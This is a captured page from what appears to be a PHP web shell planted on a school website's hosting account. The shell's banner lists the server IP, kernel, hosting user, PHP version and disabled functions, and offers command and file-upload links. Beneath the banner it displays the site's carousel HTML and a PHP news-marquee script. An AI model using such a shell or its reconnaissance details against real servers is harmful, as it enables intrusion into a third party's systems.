|
Server IP : 2a02:4780:3:2287:0:3736:a38e:8 / Your IP : 216.73.216.180 Web Server : LiteSpeed System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail, proc_open MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u926327694/domains/jssgokak.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<div id="iceslideshow" style="
margin-bottom: 0px;
">
<div id="iceslideshow110" class="iceslideshow carousel slide Slide Next carousel-fade mootools-noconflict">
<div id="ice_slideshow_preload110" class="">
<div id="movingBallG">
<div class="movingBallLineG">
</div>
<div id="movingBallG_1" class="movingBallG">
</div>
</div>
</div>
<div class="carousel-inner">
<!--<div class="item active">
<img src="./jss_files/10.png" title="Slide 1" alt="Slide 1" width="940px" height="230px">
</div>-->
<div class="item ">
<img src="./jss_files/101.jpg" title="Slide2" alt="Slide2" width="940px" height="230px">
</div>
<div class="item ">
<img src="./jss_files/102.jpg" title="Slide2" alt="Slide2" width="940px" height="230px">
</div>
<div class="item ">
<img src="./jss_files/103.jpg" title="Slide2" alt="Slide2" width="940px" height="230px">
</div>
<div class="item ">
<img src="./jss_files/104.jpg" title="Slide2" alt="Slide2" width="940px" height="230px" >
</div>
<div class="item ">
<img src="./jss_files/105.jpg" title="Slide2" alt="Slide2" width="940px" height="230px" >
</div>
</div><!-- .carousel-inner -->
<!-- next and previous controls here
href values must reference the id for this carousel -->
<div class="iceslideshow_arrow">
<a class="carousel-control left" href="http://https://jssgokak.in//#iceslideshow110" data-slide="prev">‹</a>
<a class="carousel-control right" href="http://https://jssgokak.in//#iceslideshow110" data-slide="next">›</a>
</div>
</div>
<script type="text/javascript">
jQuery(window).load (function () {
jQuery('#ice_slideshow_preload110').removeClass('ice_preload')
});
</script>
<script type="text/javascript">
if (typeof jQuery != 'undefined') {
(function($) {
$(document).ready(function(){
$('.carousel').each(function(index, element) {
$(this)[index].slide = null;
});
});
})(jQuery);
}
jQuery(document).ready(function(){
jQuery('#iceslideshow110').carousel(
{ interval: 5000, pause:"hover" }
);
});
</script>
</div><ul itemscope="" class="breadcrumb">
<marquee>
<?php
$resf=mysqli_query($con,"SELECT * FROM `news`");
while($res1f=mysqli_fetch_array($resf))
{
if($res1f['Document']!="")
{
?>
<a href="admin/pages/Admin/<?php echo $res1f['Document'];?>" target="_blank"><strong><span style="line-height: 1.3em;"><font color='RED'><?php
echo "$res1f[Description]";
?>
</font></strong></span></a>
<?php
}else
{
?>
<font color='Green'><span style="line-height: 1.3em;"><b><?php
echo "$res1f[Description]";
?>
</span></b></font>
<?php
}
}
?>
</marquee>
</ul>